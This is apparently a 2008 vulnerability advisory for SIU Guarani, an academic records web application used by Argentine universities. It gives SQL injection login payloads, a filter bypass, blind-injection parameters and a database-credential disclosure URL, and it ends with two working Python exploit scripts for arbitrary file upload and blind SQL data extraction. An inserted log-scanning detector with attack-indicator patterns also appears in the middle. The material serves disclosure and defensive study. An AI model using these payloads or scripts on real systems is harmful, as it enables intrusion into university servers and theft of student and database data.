SIU Guarani Multiple Remote Vulnerabilities
Source: www.vfcocus.net  Author: proudhon  Published: 2008-12-09
        #
    #   #   #
    ### # ##
      #####             multiple remote vulnerabilities
  ############              siu guarani
     ######
    ##  #  ##
        #


general information
-------------------
bug type : multiple remote vulnerabilities

software name : SIU Guarani

vendor : SIU (www.siu.edu.ar)

authors : proudhon & Ubik

date : the 341st day of the year 2008

contact : N/A

description : SIU-Guarani is a web application which keeps information about academic activities. it is widely used by national universities in Argentina. for more information, see the vendor's web page.

disclaimer
---------
all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be responsible for any
damage.

technical information
---------------------
disclosure of database information
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
you can get some of the database information used by Guarani, such as the database user and password. the vendor has mostly fixed this bug.
http://guarani_server/includes/elegirConexion.php

file upload
^^^^^^^^^^^
given a valid phpsessid, you can upload files to the server. this bug is fixed in some versions.
http://guarani_server/a_docentes/subirArchivo.php

sql injection
^^^^^^^^^^^^^
http://guarani_server/w_inicial.php
OR
http://guarani_server/inicial.php

Username (Identificacion): ' || (SQL Statement) || '
Password (Clave): **** (anything)

example:
Username (Identificacion): ' || DBINFO('dbhostname') || '
Password (Clave): **** (anything)

just remember they are using Informix!
sql injection is partially fixed in some places.

in order to fool some protections, such as "[Informix]An illegal character has been found in the statement.", you can use %27 instead of '.

blind sql injection
^^^^^^^^^^^^^^^^^^^
hidden parameter "operacion" in:

http://guarani_server/a_general/verMensajes.php
http://guarani_server/a_general/autentificarse.php

... and probably more!

example (via POST): http://guarani_server/a_general/verMensajes.php?operacion=op0001' || (case when 10<1 then '1' else '2' end) || '

another example (in autentificarse.php):

operacion=op0001' || (SELECT '1' FROM systables where tabid = 1) || ' 
(no error, because it returns a single value)
operacion=op0001' || (SELECT '1' FROM systables where tabid <> 1) || '
(error, because there are multiple results)

patches / workarounds
---------------------
among other things, the function which loads the external request parameters should check for special characters.
the software itself seems to be pretty buggy; releasing its source code under a license like BSD or GPL would help to improve its security.
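As an added defensive illustration (not part of the advisory and not SIU's code), the following Python 3 script matches the Informix payload shapes from the sql injection and blind sql injection sections above against percent-decoded request parameters, and scans constructed access-log lines for the "operacion" payloads; the Common Log Format layout, IP addresses and timestamps are assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicator patterns derived from the payload shapes in the advisory: a quote
# followed by Informix's || concatenation, CASE expressions, DBINFO(), the
# systables catalog, and SUBSTRING(... FROM n FOR 1) used for blind extraction.
INDICATORS = {
    "quote_concat": re.compile(r"'\s*\|\|"),
    "case_when": re.compile(r"\bcase\s+when\b.*\bend\b", re.I | re.S),
    "dbinfo": re.compile(r"\bdbinfo\s*\(", re.I),
    "systables": re.compile(r"\bsystables\b", re.I),
    "substring": re.compile(r"\bsubstring\s*\(.*\bfrom\b.*\bfor\b", re.I | re.S),
}

def classify_value(value):
    """Return the indicator names matching one already-decoded parameter value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]

# Common Log Format request line: ip ident user [time] "METHOD target HTTP/x.y" status
LOG_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')

def scan_access_log(text):
    """Return (ip, path, param, indicators) for each query-string parameter that
    carries an indicator. Values are percent-decoded before matching, so %27 is
    inspected as ' (the encoding the advisory says slips past the application's
    own illegal-character check). POST bodies never reach an access log; feed
    those values to classify_value() from an application or WAF log instead."""
    hits = []
    for line in text.splitlines():
        m = LOG_RX.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        parts = urlsplit(target)
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            found = classify_value(value)
            if found:
                hits.append((ip, parts.path, param, found))
    return hits

# Constructed sample log lines (not from the advisory); the encoded query strings
# carry the 'operacion' payloads described in the blind sql injection section.
SAMPLE_LOG = """\
10.0.0.7 - - [09/Dec/2008:10:02:00 -0300] "GET /a_general/verMensajes.php?operacion=op0001 HTTP/1.1" 200 4120
10.0.0.9 - - [09/Dec/2008:10:01:15 -0300] "GET /a_general/verMensajes.php?operacion=op0001%27%20%7C%7C%20%28case%20when%2010%3C1%20then%20%271%27%20else%20%272%27%20end%29%20%7C%7C%20%27 HTTP/1.1" 200 980
10.0.0.9 - - [09/Dec/2008:10:01:16 -0300] "GET /a_general/autentificarse.php?operacion=op0001%27%20%7C%7C%20%28SELECT%20%271%27%20FROM%20systables%20where%20tabid%20%3D%201%29%20%7C%7C%20%27 HTTP/1.1" 200 980
"""
```

The login payload from the sql injection section is checked directly with classify_value(), since a POST body is not visible in an access log.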

proof of concept
----------------
file upload
^^^^^^^^^^^
#!/bin/python
# target : SIU Guarani
# file : 4790
# quote : "el poporembo como una flor", quintin
# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be
# responsible for any damage.

import pycurl
import StringIO
import sys

if len(sys.argv) < 3:
  print "SIU guarani file upload"
  print "usage : " + sys.argv[0] + " <server> <local file>"
  print "example : " + sys.argv[0] + " someuni.edu.ar/somedir someporn.jpg"
  sys.exit(1)

print "getting phpsessid.."
c = pycurl.Curl()
c.setopt(c.URL, "http://" + sys.argv[1] + "/inicial.php")
c.setopt(c.COOKIEJAR, "/tmp/guaranicookie")
c.setopt(c.WRITEFUNCTION, (lambda x : None))
c.perform()
c.close()

print "uploading file.."
r = StringIO.StringIO()
c = pycurl.Curl()
c.setopt(c.POST, 1)
c.setopt(c.URL, "http://" + sys.argv[1] + "/a_docentes/subirArchivo.php")
c.setopt(c.HTTPPOST, [("archivo", (c.FORM_FILE, sys.argv[2]))])
c.setopt(c.COOKIEFILE, "/tmp/guaranicookie")
c.setopt(c.WRITEFUNCTION, r.write)
c.perform()
r.seek(0)
s = r.read()
r.close()
c.close()
s = (s.split("'../library/bajarArchivo.php?qs="))[1]
s = (s.split("'"))[0]
print "your download link is http://" + sys.argv[1] + "/library/bajarArchivo.php?qs=" + s
print "in order to download the file, first you'll need to join http://" + sys.argv[1] + "/ with your web browser"
# EOF

blind sql injection
^^^^^^^^^^^^^^^^^^^
#!/bin/python
# target : SIU Guarani
# file : 4791
# quote : "el poporembo como una flor", quintin
# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be
# responsible for any damage.

import pycurl
import StringIO
import sys

def dic_sql(s, i, x, y):
  num = "SUBSTRING(" + s  + " FROM " + str(i) + " FOR 1)"
  return "(" + num + " >= '" + chr(x) + "') AND (" + num + " <= '" + chr(y) + "')"

maxsize = 32

if len(sys.argv) < 3:
  print "SIU guarani blind sql execution"
  print "usage : " + sys.argv[0] + " <server> <sql string to match> [maxsize=32]"
  print "example : " + sys.argv[0] + " http://someuni.edu.ar/somedir USER"
  print "remember, it's an informix database"
  print "https support!"
  sys.exit(1)

if len(sys.argv) > 3:
  maxsize = int(sys.argv[3])

print "getting phpsessid.."
c = pycurl.Curl()

if (sys.argv[1][0:5] == "https"):
  c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.URL, sys.argv[1] + "/inicial.php")
c.setopt(c.COOKIEJAR, "/tmp/guaranicookie")
c.setopt(c.WRITEFUNCTION, (lambda x : None))
c.perform()
c.close()

print "cracking sql result.."

for l in range(1, maxsize + 1):
  i = 48
  f = 125
  c = pycurl.Curl()
  r = StringIO.StringIO()
  if (sys.argv[1][0:5] == "https"):
    c.setopt(c.SSL_VERIFYPEER, 0)
  c.setopt(c.POST, 1)
  c.setopt(c.URL, sys.argv[1] + "/a_general/verMensajes.php")
  c.setopt(c.COOKIEFILE, "/tmp/guaranicookie")
  c.setopt(c.WRITEFUNCTION, r.write)

  while i <> f:
    sql = dic_sql(sys.argv[2], l, i, i+(f-i)/2)
    c.setopt(c.HTTPPOST, [("operacion", "gda0011' || case when (" + sql + ") then '1' else '2' end || '"), ("ver", "T")])
    c.perform()
    r.seek(0)
    s = r.read()
    r.truncate(0)
    if len(s) == 0:
      print "uhm... looks like a wrong sql string!"
      sys.exit(1)
    if len(s.split("No hay mensajes.")) > 1 or len(s.split("Anuncio")) > 1:
      f = i + (f - i) / 2
    else:
      i = i + (f - i) / 2 + 1
  r.close()
  c.close()
  if i == 125:
    break
  sys.stdout.write(chr(i))
  sys.stdout.flush()
sys.stdout.write('\n')
# EOF
